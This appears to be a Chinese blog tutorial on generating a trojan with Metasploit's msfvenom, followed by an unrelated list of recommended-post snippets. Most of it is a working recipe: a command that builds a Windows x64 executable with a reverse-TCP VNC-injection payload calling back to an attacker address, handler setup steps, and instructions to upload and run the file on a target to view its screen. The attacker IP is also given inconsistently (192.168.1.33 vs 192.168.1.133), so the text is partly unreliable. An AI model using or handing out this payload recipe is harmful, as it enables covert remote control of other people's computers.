Metasploit -- 木马生成原理和方法
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。
---- 网易云热评
一、生成方式:利用msf模块中的msfvenom模块
二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
三、msfvenom命令行选项如下
-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
四、使用方法
1、msfvenom --list platforms 显示支持的平台
2、msfvenom --list formats 显示支持的格式
3、msfvenom --list archs 显示支持的架构
4、msfvenom --list encoders 显示支持的编码器
5、生成木马
目标主机:192.168.1.129(win7 x64)
攻击机:192.168.1.33
攻击端口:12121
生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
6、进入监听模块 use exploit/multi/handler
7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp
8、查看需要设置的参数:show options
9、设置攻击机ip:set lhost 192.168.1.133
10、设置攻击端口:set lport 12121
11、将生成的exe文件上传到目标主机并运行
12、run攻击
13、攻击机的监控画面
14、目标主机画面
禁止非法,后果自负
欢迎关注公众号:web安全工具库
Metasploit -- 木马生成原理和方法相关推荐
- 计算机地图制图原理与算法,计算机地图制图原理与方法-基本图形生成算法.ppt...
<计算机地图制图原理与方法-基本图形生成算法.ppt>由会员分享,可在线阅读,更多相关<计算机地图制图原理与方法-基本图形生成算法.ppt(35页珍藏版)>请在人人文库网上搜索 ...
- Metasploit 实现木马生成、捆绑及免杀
简介: 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接.木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木 ...
- 网络安全:网络攻击原理与方法.
网络安全:网络攻击原理与方法. 网络攻击:是损害网络系统安全属性的危害行为.危害行为导致网络系统的机密性.完整性.可控性.真实性.抗抵赖性等受到不同程度的破坏. 目录: 常见的危害行为有四个基本类型: ...
- 详谈asp生成静态页方法
生成静态页的好处不用说,当今大型网站,为缓解服务器端的压力许的的页面都改用了静态的页面,并利用AJAX技术动态地更新其中的部分内容,如广告等. 一个简单的不用模板可以直接生成HTML静态页的方法. 如 ...
- oracle手工收集awr报告_oracle手工生成AWR报告方法记录-阿里云开发者社区
AWR(Automatic Workload Repository)报告是我们进行日常数据库性能评定.问题SQL发现的重要手段.熟练掌握AWR报告,是做好开发.运维DBA工作的重要基本功. AWR报告 ...
- 基于 Tracing 数据的拓扑关系生成原理
背景 随着互联网架构的流行,越来越多的系统开始走向分布式化.微服务化.如何快速发现和定位分布式系统下的各类性能瓶颈成为了摆在开发者面前的难题.借助分布式追踪系统的调用链路还原能力,开发者可以完整地了解 ...
- php图片生成缩略图_php实现根据url自动生成缩略图的方法
本文实例讲述了php实现根据url自动生成缩略图的方法,是非常实用的功能.分享给大家供大家参考.具体方法如下: 原理:设置apache rewrite ,当图片不存在时,调用php创建图片. 例如: ...
- 《异构信息网络挖掘: 原理和方法》—— 1.3 本书的内容组织
本节书摘来自华章出版社<异构信息网络挖掘: 原理和方法法>一 书中的第1章,第1.3节,作者( 美)孙艺洲(Yizhou Sun),(美)韩家炜(Jiawei Han),更多章节内容可以访 ...
- MFC原理与方法(一)
MFC原理与方法(一) 一.前言 二.什么是MFC? 三.MFC编程的环境配置 四.使用MFC进行一些简单操作 五.结语 一.前言 哈喽!好久不见呀!我们又见面了,我是不会食言的,说到做到.见字如面, ...
最新文章
- 【转载】MSXML应用总结 开发篇(下)
- 深入java虚拟机 第四版_深入理解Java虚拟机-常用vm参数分析
- [HNOI 2011]XOR和路径
- 不忘初心,努力做最好的自己
- 基于阿里的Node全栈之路(二)阿里负载均衡的HTTPS优化方案
- FPGA篇(一) 基于verilog的定点开方运算(1)-逐次逼近算法
- 数据链路层:ARP协议详解(绝对经典)
- Nginx的client_header_buffer_size和large_client_header_buffers学习
- LeetCode 85.最大矩形
- FTL(闪存转换层)简单介绍
- [EMNLP 2022] VIRT: Improving Representation-based Text Matching via Virtual Interaction
- 纸壳CMS的插件加载机制
- Git 彻底删除大文件
- 首旅如家蝉联世界酒店集团10强,中高端酒店开业超1000家
- 百度域名阿里主机如何解析
- 电脑开机就黑屏的几种原因以及解决方案
- 可可粉的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
- LQ0270 手机尾数【水题】
- STM32CubeMx 串口打印调试信息
- PHP大灌篮投篮游戏源码 微信+手机wap源码 带控制_大灌篮游戏源码